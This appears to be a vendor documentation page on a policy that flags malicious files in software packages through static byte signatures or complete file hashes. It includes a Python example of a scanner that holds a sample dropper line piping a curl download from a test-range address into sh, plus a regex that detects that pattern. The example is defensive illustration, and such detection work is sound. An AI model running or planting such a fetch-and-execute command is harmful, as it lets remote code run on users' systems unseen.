SQ30104
Detected presence of malicious files by a dedicated signature.
| priority | CI/CD status | severity | effort | RL level | RL assessment |
|---|---|---|---|---|---|
| | fail | high | high | 1 | malware: fail Reason: malicious components found |
About the issue
Proprietary ReversingLabs malware detection algorithms have determined that the software package contains one or more malicious files. The detection was made by either a static byte signature or a complete file hash. This malware detection method is considered highly accurate, and can typically identify the malware family by name.
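As an added illustration of the two detection methods named above (this is example code written for this page, not ReversingLabs' own algorithms or signature format), the Python sketch below scans file contents against a full-file hash blocklist and a set of static byte signatures. The blocklist hash, the byte pattern, the family label "Example.Downloader.A" and the sample file contents are all constructed for the example; the 192.0.2.x addresses are from the reserved TEST-NET range. It also shows the practical difference between the two methods: a one-byte change to the file defeats the hash match but not the byte signature.

```python
"""Hash-match and byte-signature detection over package files.

Added example for this page; the blocklist, signatures and sample files below
are constructed for illustration and are not ReversingLabs data.
"""
import hashlib
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Pattern, Tuple

# Constructed sample: a shell dropper that fetches and executes a remote script.
SAMPLE_DROPPER = b"#!/bin/sh\ncurl -s http://192.0.2.10/x | sh\n"

# Hypothetical blocklist of complete-file SHA-256 digests -> family name.
HASH_BLOCKLIST: Dict[str, str] = {
    hashlib.sha256(SAMPLE_DROPPER).hexdigest(): "Example.Downloader.A",
}

# Hypothetical static byte signatures -> family name. A regex over bytes lets
# the signature tolerate variable parts (here the download host and path).
BYTE_SIGNATURES: List[Tuple[Pattern[bytes], str]] = [
    (re.compile(rb"curl\s+-s\s+http://[^\s|]+\s*\|\s*sh"), "Example.Downloader.A"),
]


@dataclass
class Detection:
    method: str            # "hash" or "signature"
    family: str            # malware family label from the matching rule
    offset: Optional[int]  # byte offset of a signature match; None for hash


def scan_bytes(data: bytes) -> Optional[Detection]:
    """Return the first detection for one file's contents, or None if clean.

    The exact hash lookup runs first because it cannot false-positive; the
    byte signatures run next and also catch variants the hash would miss.
    """
    digest = hashlib.sha256(data).hexdigest()
    if digest in HASH_BLOCKLIST:
        return Detection("hash", HASH_BLOCKLIST[digest], None)
    for pattern, family in BYTE_SIGNATURES:
        match = pattern.search(data)
        if match:
            return Detection("signature", family, match.start())
    return None


def scan_package(files: Dict[str, bytes]) -> Dict[str, Detection]:
    """Scan every file of an unpacked package (path -> bytes) and return the
    paths that triggered a detection with the detection details."""
    return {path: det for path, data in files.items()
            if (det := scan_bytes(data)) is not None}


if __name__ == "__main__":
    # Constructed package: one clean file, the original dropper, and a variant
    # whose download host differs by one byte.
    variant = SAMPLE_DROPPER.replace(b"192.0.2.10", b"192.0.2.11")
    package = {
        "lib/util.py": b"def add(a, b):\n    return a + b\n",
        "scripts/postinstall.sh": SAMPLE_DROPPER,
        "scripts/preinstall.sh": variant,
    }
    for path, det in scan_package(package).items():
        print(f"{path}: {det.family} via {det.method}"
              + (f" at offset {det.offset}" if det.offset is not None else ""))
```

Running the block reports the original dropper by hash and the one-byte variant only by signature, while the clean file produces nothing; this is why a signature hit typically names the family even when the exact sample has never been seen before.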
How to resolve the issue
- If the software is not intended to behave maliciously, investigate the build and release environment for a software supply chain compromise.
- Avoid using this software package.
Incidence statistics
ReversingLabs periodically collects and analyzes the contents of popular software package repositories for threat research purposes.
For every repository, the chart shows the percentage of projects that triggered the software assurance policy. In other words, it shows how many projects were found to have the specific issue described on this page.
The percentages are calculated from the total number of packages analyzed:
- RubyGems: 174K
- NuGet: 189K
- PyPI: 403K
- npm: 2.1M
Recommended reading
- File signature (External resource - Wikipedia)
- What is a file signature? (External resource - threat.media)